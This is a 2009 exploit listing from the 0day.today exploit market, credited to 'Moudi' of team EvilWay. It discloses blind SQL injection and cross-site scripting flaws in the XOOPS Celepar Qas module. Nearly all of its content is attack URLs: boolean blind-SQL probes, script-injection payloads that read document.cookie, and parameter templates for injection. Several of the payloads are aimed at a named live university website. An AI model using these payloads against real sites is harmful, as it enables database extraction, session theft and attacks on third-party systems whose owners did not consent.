[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities

Author
Moudi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5549
Category
web applications
Date add
26-07-2009
Platform
unsorted
===================================================================
XOOPS Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
===================================================================


==============================================================================
        [»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Xoops Celepar Module Qas ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz  ]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ FREE ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/categoria.php?cod_categoria=[BLIND]
[»] http://www.site.com/patch/imprimir.php?codigo=[BLIND]
[»] http://www.site.com/patch/aviso.php?codigo=[BLIND]

[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=2 <= FALSE

[»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=2 <= FALSE

[»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=2 <= FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/categoria.php?cod_categoria=[XSS]
[»] http://www.site.com/patch/index.php?opcao=[XSS]
[»] http://www.site.com/patch/categoria.php/[XSS]
[»] http://www.site.com/patch/index.php/[XSS]

[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria="><script>alert(document.cookie);</script>
[»] http://www.dce.uem.br/modules/qas/index.php?opcao=1>'><ScRiPt %0A%0D>alert(439286918587)%3B</ScRiPt>
[»] http://www.dce.uem.br/modules/qas/categoria.php/>'><ScRiPt>alert(665068655391)</ScRiPt>
[»] http://www.dce.uem.br/modules/qas/index.php/>'><ScRiPt>alert(657988605523)</ScRiPt>

Author: Moudi

###########################################################################




#  0day.today [2024-12-23]  #